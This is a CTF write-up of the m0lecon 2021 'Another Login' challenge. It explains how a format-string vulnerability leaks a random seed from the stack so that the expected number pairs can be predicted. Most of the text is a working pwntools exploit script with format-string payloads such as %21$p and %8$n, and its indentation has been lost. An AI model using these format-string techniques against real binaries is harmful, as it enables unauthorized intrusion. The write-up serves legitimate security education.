[Link to original
writeup](https://wrecktheline.com/writeups/m0lecon-2021/#login1_writeup)

# Another Login (29 solves, 160 points)  
by FeDEX

```  
Just another simple login bypass challenge.

nc challs.m0lecon.it 1907

Author: Alberto247  
```

We are presented a binary and a remote end:  
```  
$ file chall  
chall: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically
linked, interpreter /lib64/ld-linux-x86-64.so.2,
BuildID[sha1]=7d6890a38b10cab434c876854ab80f742d3abf77, for GNU/Linux 3.2.0,
not stripped  
```

Reversing the binary is pretty straight forward. The binary reads 4 random
bytes from `/dev/urandom` and uses them to initiate `srandom()`.  
After that, the binary proceeds to generate 15 times one pair of number: `public | private`.   
We are asked to provide the sum of the pair.

However, due to the fact that the program has unsanitized output formating, we
can leak the seed from the stack using this vulnerability and then
precalculate all pairs of numbers:

```python  
if __name__ == "__main__":

from hashlib import sha256  
from binascii import unhexlify  
import re  
from itertools import product

while 1:  
  
######################################## POW

p = remote(remote_server, PORT)

ret = p.recvline().strip().decode()  
prefix, suffix = re.findall(r"Give me a string starting with (.+) such that
its sha256sum ends in (.+).", ret)[0]

for i_list in product(list(range(32, 128)), repeat=5):  
c_list = list(map(chr, i_list))  
tmp = prefix + "".join(c_list)  
tmp_hash = sha256(tmp.encode()).hexdigest()  
if tmp_hash[-5:] == suffix:  
print "found!"  
p.sendline(tmp)  
break  
else:  
print "not found..."

######################################## EXPLOIOT

p.recvline()

p.recvuntil('Give me the 1 secret, summed to')  
looking = p.recvline().strip().replace('!','')  
print 'Value now is >>',looking,'<<'

payload = '%21$p' # leak seed from stack  
payload += '%172c' #  
payload += '%8$n' # put value 190 at int_input

p.sendline(payload)

data = p.recvline()  
data = p.recvline()  
print 'SEED=', data[2:10]

seed = int('0x'+data[2:10],16)

libc_native.srand(seed)  
caca = libc_native.rand() % 255  
print 'GENERATED I got',libc_native.rand() % 8 + 2,caca

if 'NOPE' in p.recvline():  
p.close()  
continue  
else:  
print 'MATCH!!!'  
# gdb.attach(p)  
  
for i in range(15):  
val1 = libc_native.rand() % 256  
val2 = libc_native.rand() % 8 + 2  
p.sendline('%'+str(val1+val2)+'c' + '%8$n')

# ============ GDB =========== #

p.interactive()  
```

\- flag: `ptm{D1d_u_r3ad_th3_0per4t0r_m4nua1_b3f0re_l0gging_1n?}`

Original writeup
(https://wrecktheline.com/writeups/m0lecon-2021/#login1_writeup).